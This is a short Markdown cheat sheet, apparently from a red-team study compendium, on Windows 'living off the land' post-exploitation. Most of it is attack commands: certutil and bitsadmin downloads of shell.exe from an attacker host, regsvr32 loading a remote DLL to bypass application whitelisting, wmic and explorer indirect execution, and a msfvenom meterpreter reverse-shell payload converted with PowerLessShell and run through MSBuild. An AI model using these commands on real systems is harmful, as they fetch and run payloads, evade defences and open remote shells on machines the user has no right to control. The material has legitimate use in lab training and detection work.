killchain-compendium/Post Exploitation/Windows/Living off the Land.md

LOLBINS

• LOLBAS
  • All binaries are signed by Microsoft
  • Shows paths to the binary

Ingress Tool Transfer

• certutil.exe, may be used for payload encoding as well

certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
certutil.exe -encode shell.exe encoded-shell.txt

• bitsadmin

bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe

• findstr

findstr /v dummystring  \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe

Indirect Command Execution

• Explorer as parent process to execute other PEs

explorer /root, "C:\Windows\System32\cmd.exe"

• Windows management instrumentation

wmic.exe process call create calc

• rundll32.exe

Bypass Whiteslists

• regsvr32.exe can execute PEs in memory, even remotely
• DLL has to match architecture

C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll
C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll

• bash.exe -c calc.exe

Shortcut Modification Technique

• Execute PEs via shortcuts
• Clone powerlessshell
• msfvenom with windows/meterpreter/reverse_winhttps
• Set multi/handler with set payload windows/meterpreter/reverse_winhttps
• Transform to *.csproj

python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj

• Execute on target

c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj